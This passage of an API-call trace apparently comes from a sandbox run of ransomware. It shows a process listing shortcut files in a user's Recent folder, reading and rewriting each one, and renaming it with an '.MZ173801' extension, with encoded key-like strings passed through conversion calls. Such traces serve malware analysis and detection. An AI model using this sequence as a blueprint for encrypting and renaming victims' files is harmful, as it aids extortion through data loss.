lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0109.162] GetCurrentThreadId () returned 0x1358 [0109.163] GetCurrentThreadId () returned 0x1358 [0109.163] GetCurrentThreadId () returned 0x1358 [0109.163] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.163] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0109.163] GetCurrentThreadId () returned 0x1358 [0109.163] GetCurrentThreadId () returned 0x1358 [0109.163] GetCurrentThreadId () returned 0x1358 [0109.163] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\G5n4vH.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\g5n4vh.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.163] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0109.163] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.164] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x3c5 [0109.164] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.164] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x3c5, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x3c5, lpOverlapped=0x0) returned 1 [0109.164] CloseHandle (hObject=0x3f4) returned 1 [0109.165] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\G5n4vH.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\g5n4vh.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.165] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x3c5, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x3c5, lpOverlapped=0x0) returned 1 [0109.166] CloseHandle (hObject=0x3f4) returned 1 [0109.167] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\G5n4vH.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\g5n4vh.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\G5n4vH.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\g5n4vh.lnk.mz173801")) returned 1 [0109.168] GetCurrentThreadId () returned 0x1358 [0109.168] GetCurrentThreadId () returned 0x1358 [0109.168] GetCurrentThreadId () returned 0x1358 [0109.168] GetCurrentThreadId () returned 0x1358 [0109.168] GetCurrentThreadId () returned 0x1358 [0109.168] GetCurrentThreadId () returned 0x1358 [0109.168] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeac0794c, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeac0794c, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeac0794c, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x5f1, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="GuM0xcHUsONHLGItnv.lnk", cAlternateFileName="GUM0XC~1.LNK")) returned 1 [0109.168] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0109.168] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0109.168] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\GuM0xcHUsONHLGItnv.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\gum0xchusonhlgitnv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeac0794c, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeac0794c, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeac0794c, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x5f1)) returned 1 [0109.168] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.168] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0109.169] GetCurrentThreadId () returned 0x1358 [0109.169] GetCurrentThreadId () returned 0x1358 [0109.169] GetCurrentThreadId () returned 0x1358 [0109.169] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.169] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0109.169] GetCurrentThreadId () returned 0x1358 [0109.169] GetCurrentThreadId () returned 0x1358 [0109.169] GetCurrentThreadId () returned 0x1358 [0109.169] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\GuM0xcHUsONHLGItnv.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\gum0xchusonhlgitnv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.169] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0109.170] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.170] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x5f1 [0109.170] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.170] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x5f1, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x5f1, lpOverlapped=0x0) returned 1 [0109.170] CloseHandle (hObject=0x3f4) returned 1 [0109.171] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\GuM0xcHUsONHLGItnv.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\gum0xchusonhlgitnv.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.171] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x5f1, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x5f1, lpOverlapped=0x0) returned 1 [0109.172] CloseHandle (hObject=0x3f4) returned 1 [0109.174] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\GuM0xcHUsONHLGItnv.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\gum0xchusonhlgitnv.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\GuM0xcHUsONHLGItnv.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\gum0xchusonhlgitnv.lnk.mz173801")) returned 1 [0109.175] GetCurrentThreadId () returned 0x1358 [0109.175] GetCurrentThreadId () returned 0x1358 [0109.175] GetCurrentThreadId () returned 0x1358 [0109.175] GetCurrentThreadId () returned 0x1358 [0109.175] GetCurrentThreadId () returned 0x1358 [0109.175] GetCurrentThreadId () returned 0x1358 [0109.175] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea389344, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea389344, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xea389344, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x663, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="H0Fbjn1UaDFSWci6YS.lnk", cAlternateFileName="H0FBJN~1.LNK")) returned 1 [0109.175] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0109.175] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0109.175] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\H0Fbjn1UaDFSWci6YS.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\h0fbjn1uadfswci6ys.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea389344, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea389344, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xea389344, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x663)) returned 1 [0109.175] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 